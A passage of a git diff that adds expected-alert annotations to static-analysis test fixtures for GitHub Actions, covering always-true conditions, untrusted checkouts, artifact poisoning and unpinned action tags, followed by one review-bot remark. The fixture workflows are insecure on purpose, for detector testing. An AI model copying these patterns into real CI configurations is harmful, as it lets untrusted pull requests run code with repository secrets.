- 3 == 4 }}
+ 3 == 4 }} # $ Alert[actions/if-expression-always-true/critical]
 - name: Test 9
 if: '${{ github.actor == "foo" }}'
 run: echo "Test 9 should not be printed"
@@ -53,10 +53,10 @@ jobs:
 if: "${{ github.actor == 111 }}"
 run: echo "Test 10 should not be printed"
 - name: Test 11
- if: " ${{ github.actor == 111 }}"
+ if: " ${{ github.actor == 111 }}" # $ Alert[actions/if-expression-always-true/critical]
 run: echo "Test 11 should not be printed"
 - name: Test 12
- if: " ${{ github.actor == 111 }}"
+ if: " ${{ github.actor == 111 }}" # $ Alert[actions/if-expression-always-true/critical]
 run: echo "Test 12 should not be printed"
 - name: Test 13
 if: |
@@ -79,27 +79,27 @@ jobs:
 if: |+
 ${{( false ||
 github.actor == "foo"
- )}}
+ )}} # $ Alert[actions/if-expression-always-true/critical]
 run: echo "Test 16 should not be printed"
 - name: Test 17
 if: >+
 ${{( false ||
 github.actor == "foo"
- )}}
+ )}} # $ Alert[actions/if-expression-always-true/critical]
 run: echo "Test 17 should not be printed"
 - name: Test 18
- if: ${{ github.actor }} == 'foo'
+ if: ${{ github.actor }} == 'foo' # $ Alert[actions/if-expression-always-true/critical]
 run: echo "Test 18 should not be printed"
 - name: Test 19
- if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association )}} || github.actor == 'renovate[bot]'
+ if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association )}} || github.actor == 'renovate[bot]' # $ Alert[actions/if-expression-always-true/critical]
 run: echo "Test 19 should not be printed"
 - name: Test 20
- if: ${{ github.actor }} != ""
+ if: ${{ github.actor }} != "" # $ Alert[actions/if-expression-always-true/critical]
 run: echo "Test 20 should not be printed"
 - name: Test 21
 if: >
 ${{ github.actor == 'foo' &&
- github.event.workflow_run.conclusion == 'success' }}
+ github.event.workflow_run.conclusion == 'success' }} # $ Alert[actions/if-expression-always-true/critical]
 run: echo "Test 21 should not be printed"
 - name: Test 22
 if: |
diff --git a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref
index 823f802a70f..0c665471caf 100644
--- a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref
@@ -1 +1,2 @@
-Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql
+query: Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref
index f12135bd1b8..546bb9dd0c9 100644
--- a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref
@@ -1 +1,2 @@
-Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql
+query: Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml
index cd4f0fe660a..47151cec6de 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml
@@ -8,6 +8,6 @@ runs:
 with:
 ref: ${{ github.event.pull_request.head.sha }}
 fetch-depth: 2
- - run: echo "foo"
+ - run: echo "foo" # $ Alert[actions/untrusted-checkout/critical]
 shell: bash
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml
index 4241647d3e1..ad2a67b14bb 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml
@@ -22,7 +22,7 @@ runs:
 });
 let fs = require('fs');
 fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data));
- - run: |
+ - run: | # $ Alert[actions/artifact-poisoning/critical] Alert[actions/unversioned-immutable-action]
 mkdir -p /tmp/artifacts
 unzip /tmp/artifacts.zip
 shell: bash
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml
index 0c205952102..ac4364695ee 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml
@@ -22,7 +22,7 @@ runs:
 });
 let fs = require('fs');
 fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data));
- - run: |
+ - run: | # $ Alert[actions/unversioned-immutable-action]
 mkdir -p /tmp/artifacts
 unzip /tmp/artifacts.zip -d /tmp/artifacts
 shell: bash
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/unpinned-tag/action.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/unpinned-tag/action.yml
index 782505cc698..db50d733137 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/unpinned-tag/action.yml
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/unpinned-tag/action.yml
@@ -2,5 +2,5 @@ name: Composite unpinned tag test
 runs:
 using: "composite"
 steps:
- - uses: foo/bar@v2
+ - uses: foo/bar@v2 # $ Alert[actions/unpinned-tag]
 - uses: foo/bar@25b062c917b0c75f8b47d8469aff6c94ffd89abb
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml
index 08a25646d6a..369412a9c4d 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml
@@ -16,11 +16,11 @@ jobs:
 npm install
 npm build
- - uses: completely/fakeaction@v2
+ - uses: completely/fakeaction@v2 # $ Alert[actions/unpinned-tag]
 with:
 arg1: ${{ secrets.supersecret }}
- - uses: fakerepo/comment-on-pr@v1
+ - uses: fakerepo/comment-on-pr@v1 # $ Alert[actions/unpinned-tag]
 with:
 message: |
 Thank you!
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml
index 7eaee9fa6d3..42322833ce7 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml
@@ -8,12 +8,12 @@ jobs:
 runs-on: ubuntu-latest
 steps:
 - name: download pr artifact
- uses: dawidd6/action-download-artifact@v2
+ uses: dawidd6/action-download-artifact@v2 # $ Alert[actions/unpinned-tag]
 with:
 workflow: ${{github.event.workflow_run.workflow_id}}
 run_id: ${{github.event.workflow_run.id}}
 name: artifact
- - id: pr_number
+ - id: pr_number # $ Alert[actions/artifact-poisoning/critical]
 run: |
 PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)
- echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT
+ echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT # $ Sink[actions/artifact-poisoning/critical]
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml
index f8d3736dba5..44e8a18d733 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml
@@ -29,13 +29,13 @@ jobs:
 });
 let fs = require('fs');
 fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/sonarcloud-data.zip`, Buffer.from(download.data));
- - name: Unzip
+ - name: Unzip # $ Alert[actions/artifact-poisoning/critical]
 run: |
 unzip sonarcloud-data.zip -d sonarcloud-data
 ls -a sonarcloud-data
 - name: Run command
 run:
- ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build
+ ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build # $ Sink[actions/artifact-poisoning/critical]
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml
index aa884b7eca7..953d06f55c7 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml
@@ -29,12 +29,12 @@ jobs:
 });
 let fs = require('fs');
 fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/sonarcloud-data.zip`, Buffer.from(download.data));
- - name: Unzip
+ - name: Unzip # $ Alert[actions/artifact-poisoning/critical]
 run: |
 unzip sonarcloud-data.zip
 ls -a sonarcloud-data
 - name: Run command
 run:
- python foo/x.py
+ python foo/x.py # $ Sink[actions/artifact-poisoning/critical]
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml
index e73548895d3..81f42aa335b 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml
@@ -10,14 +10,14 @@ jobs: Download: runs-on: ubuntu-latest steps: - - uses: dawidd6/action-download-artifact@v2 + - uses: dawidd6/action-download-artifact@v2 # $ Alert[actions/unpinned-tag] with: name: artifact_name workflow: wf.yml path: foo - - name: Run command + - name: Run command # $ Alert[actions/artifact-poisoning/critical] run: | - sh foo/cmd + sh foo/cmd # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml index ac970fff840..ca69571fab2 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml @@ -10,12 +10,12 @@ jobs: Download: runs-on: ubuntu-latest steps: - - uses: dawidd6/action-download-artifact@v2 + - uses: dawidd6/action-download-artifact@v2 # $ Alert[actions/unpinned-tag] with: name: artifact_name workflow: wf.yml - - name: Run command - run: sh cmd + - name: Run command # $ Alert[actions/artifact-poisoning/critical] + run: sh cmd # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml index 0e7c6f97cf5..d08b18147fe 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml 
@@ -12,11 +12,11 @@ jobs: steps: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - - name: Unzip + - name: Unzip # $ Alert[actions/artifact-poisoning/critical] run: | unzip artifact_name.zip -d foo - name: Run command - run: ./foo/cmd + run: ./foo/cmd # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml index 7a837ee42d2..a573db866bd 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml @@ -13,9 +13,9 @@ jobs: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo unzip artifact_name.zip -d bar - - name: Run command + - name: Run command # $ Alert[actions/artifact-poisoning/critical] run: | - ./bar/cmd + ./bar/cmd # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml index 39ec063c7b6..b40091d7808 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml @@ -13,9 +13,9 @@ jobs: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo unzip foo/artifact_name.zip - - name: Run command + - name: Run command # $ Alert[actions/artifact-poisoning/critical] run: | - ./bar/cmd + ./bar/cmd # $ Sink[actions/artifact-poisoning/critical] 
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml index 905a4eaccb1..b4319fd42f9 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml @@ -13,13 +13,13 @@ jobs: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo unzip foo/artifact_name.zip - - name: Setup Node.js + - name: Setup Node.js # $ Alert[actions/artifact-poisoning/critical] uses: actions/setup-node@v4 with: node-version: 21 - run: | npm install - npm run lint + npm run lint # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml index afa3e15132e..645fe636d3e 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml @@ -18,8 +18,8 @@ jobs: gh api $url > "$name.zip" unzip -d "foo" "$name.zip" done - - name: Run command - run: ./foo/cmd + - name: Run command # $ Alert[actions/artifact-poisoning/critical] + run: ./foo/cmd # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml index d3100d46edc..24fef012e0e 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml 
@@ -18,8 +18,8 @@ jobs: gh api $url > "$name.zip" unzip "$name.zip" done - - name: Run command - run: ./cmd + - name: Run command # $ Alert[actions/artifact-poisoning/critical] + run: ./cmd # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml index 8cb380ae043..4430b91fba9 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml @@ -7,12 +7,12 @@ jobs: runs-on: ubuntu-latest steps: - name: download pr artifact - uses: dawidd6/action-download-artifact@v2 + uses: dawidd6/action-download-artifact@v2 # $ Alert[actions/unpinned-tag] with: workflow: ${{github.event.workflow_run.workflow_id}} run_id: ${{github.event.workflow_run.id}} name: artifact - - name: Use artifact + - name: Use artifact # $ Alert[actions/artifact-poisoning/critical] run: | - sed -f config foo.md > bar.md + sed -f config foo.md > bar.md # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml index 399adf3dff7..5a6bf1d6225 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml @@ -11,7 +11,7 @@ jobs: - uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - run: | + - run: | # $ Alert[actions/untrusted-checkout/medium] bash script.sh - uses: actions/upload-artifact@v4 with: 
@@ -28,4 +28,4 @@ jobs: - uses: actions/download-artifact@v4.0.0 with: name: results - - run: python test.py + - run: python test.py # $ Alert[actions/artifact-poisoning/critical] Alert[actions/artifact-poisoning/path-traversal] Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml index af9f01b572f..184661fda49 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml @@ -15,7 +15,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 - - uses: ./.github/actions/download-artifact + - uses: ./.github/actions/download-artifact # $ Alert[actions/unversioned-immutable-action] - id: metadata run: | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" @@ -25,5 +25,5 @@ jobs: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 with: ref: ${{ env.PR_COMMIT }} - - uses: ./.github/actions/install-deps + - uses: ./.github/actions/install-deps # $ Alert[actions/unversioned-immutable-action] - run: make snapshot diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml index e35bc73c3bd..806b9920467 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml 
@@ -15,7 +15,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 - - uses: ./.github/actions/download-artifact-2 + - uses: ./.github/actions/download-artifact-2 # $ Alert[actions/unversioned-immutable-action] - id: metadata run: | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" @@ -25,5 +25,5 @@ jobs: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 with: ref: ${{ env.PR_COMMIT }} - - uses: ./.github/actions/install-deps - - run: make snapshot + - uses: ./.github/actions/install-deps # $ Alert[actions/unversioned-immutable-action] + - run: make snapshot # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning96.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning96.yml index f970a3fa197..6498802afc9 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning96.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning96.yml @@ -15,4 +15,4 @@ jobs: with: github-token: ${{ secrets.GITHUB_TOKEN }} run-id: ${{ github.event.workflow_run.id }} - - run: npm install \ No newline at end of file + - run: npm install # $ Alert[actions/artifact-poisoning/critical] Sink[actions/artifact-poisoning/critical] \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml index 28ffab637f0..7093027c4d9 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml 
@@ -24,7 +24,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Set up Python ${{ env.min-python-version }} + - name: Set up Python ${{ env.min-python-version }} # $ Alert[actions/untrusted-checkout/critical] uses: actions/setup-python@v2 with: python-version: ${{ env.min-python-version }} @@ -34,7 +34,7 @@ jobs: python -m pip install --upgrade pip pip install -r requirements.txt - - name: Lint with flake8 + - name: Lint with flake8 # $ Sink[actions/untrusted-checkout/critical] run: flake8 - name: Check black formatting @@ -49,7 +49,7 @@ jobs: run: mypy if: success() || failure() - test: + test: # $ Sink[actions/untrusted-checkout/critical] permissions: # Gives the action the necessary permissions for publishing new # comments in pull requests. @@ -71,7 +71,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref || github.event.pull_request.base.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Set up Python ${{ matrix.python-version }} + - name: Set up Python ${{ matrix.python-version }} # $ Alert[actions/untrusted-checkout/critical] uses: actions/setup-python@v2 with: python-version: ${{ matrix.python-version }} @@ -81,7 +81,7 @@ jobs: python -m pip install --upgrade pip pip install -r requirements.txt - - name: Run unittest tests with coverage + - name: Run unittest tests with coverage # $ Sink[actions/untrusted-checkout/critical] run: | pytest -n auto --cov=autogpt --cov-report term-missing --cov-branch --cov-report xml --cov-report term env: @@ -90,8 +90,8 @@ jobs: AGENT_MODE: ${{ vars.AGENT_MODE }} AGENT_TYPE: ${{ vars.AGENT_TYPE }} - - name: Upload coverage reports to Codecov - uses: codecov/codecov-action@v3 + - name: Upload coverage reports to Codecov # $ Sink[actions/untrusted-checkout/critical] + uses: codecov/codecov-action@v3 # $ Alert[actions/unpinned-tag] - name: Stage new files and commit id: stage_files 
@@ -108,7 +108,7 @@ jobs: - name: Create PR id: create_pr if: ${{ env.TIMESTAMP_COMMIT != null }} - uses: peter-evans/create-pull-request@v5 + uses: peter-evans/create-pull-request@v5 # $ Alert[actions/unpinned-tag] with: commit-message: Update cassettes branch: cassette-diff-PR-${{ github.event.pull_request.number }}-${{ env.TIMESTAMP_COMMIT }} @@ -124,7 +124,7 @@ jobs: - name: Comment PR URL in the current PR if: ${{ env.TIMESTAMP_COMMIT != null }} - uses: thollander/actions-comment-pull-request@v2 + uses: thollander/actions-comment-pull-request@v2 # $ Alert[actions/unpinned-tag] with: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} message: | diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml index 072eae4b1d2..a905b6b9d66 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml @@ -35,7 +35,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} token: ${{ secrets.DEPENDABOT_AUTOBUILD }} - - name: Read .nvmrc + - name: Read .nvmrc # $ Alert[actions/untrusted-checkout/medium] id: nvm run: echo "NVMRC=$(cat .nvmrc)" >> $GITHUB_OUTPUT diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml index 1bda517c9a1..308cc9fde51 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml @@ -17,7 +17,7 @@ jobs: show-progress: false ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-java@v4 + - uses: actions/setup-java@v4 # $ Alert[actions/untrusted-checkout/critical] with: distribution: temurin java-version: 17 
@@ -45,7 +45,7 @@ jobs: env: GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} - - name: Merge Dependabot pull request + - name: Merge Dependabot pull request # $ Sink[actions/untrusted-checkout/critical] if: steps.set-milestone.outputs.mergeEnabled run: gh pr merge ${{ github.event.pull_request.number }} --auto --rebase env: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml index 3b8a6d6dd62..b338fbc5f16 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml @@ -23,7 +23,7 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ inputs.branch }} - - run: | + - run: | # $ Alert[actions/untrusted-checkout/critical] npm install npm run lint - + # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml index ab121239c6e..f34f96996c5 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml @@ -15,9 +15,9 @@ jobs: git merge --no-commit --no-edit origin/$HEAD_BRANCH env: HEAD_BRANCH: ${{ github.head_ref }} - - uses: actions/setup-node@v1 + - uses: actions/setup-node@v1 # $ Alert[actions/untrusted-checkout/critical] # 2. Potentially untrusted commands are being run during "npm install" or "npm build" as # the build scripts and referenced packages are controlled by the author of the pull request - run: | npm install - npm build + npm build # $ Sink[actions/untrusted-checkout/critical] 
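Review bot: The added `# $ Sink[actions/untrusted-checkout/critical]` line in reusable.yml sits directly below `npm run lint` inside a `run: |` block scalar, and the collapsed diff does not show its indentation; if it is indented to the script's content column it becomes a line of the shell script (harmless at runtime as a shell comment, but a change to the fixture's `run` text and to the node whose end line the expectation is matched against). Keep it below the scalar's content column so YAML treats it as a trailing comment, or attach it to the indicator line as `run: | # $ Sink[actions/untrusted-checkout/critical]` if the matched location allows, as artifactpoisoning81.yml does for its `Alert`. The enclosing job starts above the hunk, so whether a later step follows this scalar cannot be seen here.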
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml index 221854ec204..984c56d9028 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml @@ -11,7 +11,7 @@ jobs: steps: - name: (PR comment) Get PR branch if: ${{ github.event_name == 'issue_comment' }} - uses: xt0rted/pull-request-comment-branch@v2 + uses: xt0rted/pull-request-comment-branch@v2 # $ Alert[actions/unpinned-tag] id: comment-branch - name: (PR comment) Checkout PR branch if: ${{ github.event_name == 'issue_comment' }} @@ -24,7 +24,7 @@ jobs: steps: - name: (PR comment) Get PR branch if: ${{ github.event_name == 'issue_comment' }} - uses: xt0rted/pull-request-comment-branch@v2 + uses: xt0rted/pull-request-comment-branch@v2 # $ Alert[actions/unpinned-tag] id: comment-branch - name: (PR comment) Checkout PR branch @@ -38,7 +38,7 @@ jobs: steps: - name: resolve pr refs id: refs - uses: eficode/resolve-pr-refs@main + uses: eficode/resolve-pr-refs@main # $ Alert[actions/unpinned-tag] with: token: ${{ secrets.GITHUB_TOKEN }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml index ece4c02c356..133d033a4e9 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml 
@@ -13,7 +13,7 @@ jobs: uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.ref || github.head_ref }} # Checkout the branch that made the PR or the comment's PR branch - test2: + test2: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-latest if: github.event.issue.pull_request && github.event.comment.body == '/trigger release' steps: @@ -21,7 +21,7 @@ jobs: with: ref: refs/pull/${{ github.event.issue.number }}/merge - test3: + test3: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-latest if: github.event.issue.pull_request && github.event.comment.body == '/trigger release' steps: @@ -29,7 +29,7 @@ jobs: with: ref: ${{ format('refs/pull/{0}/merge', github.event.issue.number) }} - test4: + test4: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-latest steps: - name: Checkout Branch @@ -37,10 +37,10 @@ jobs: with: ref: ${{ (github.event_name == 'pull_request_review_comment') && format('refs/pull/{0}/merge', github.event.pull_request.number) || '' }} - test5: + test5: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-latest steps: - name: Checkout Branch uses: actions/checkout@v4 with: - ref: ${{ github.event_name == 'issue_comment' && format('refs/pull/{0}/merge', 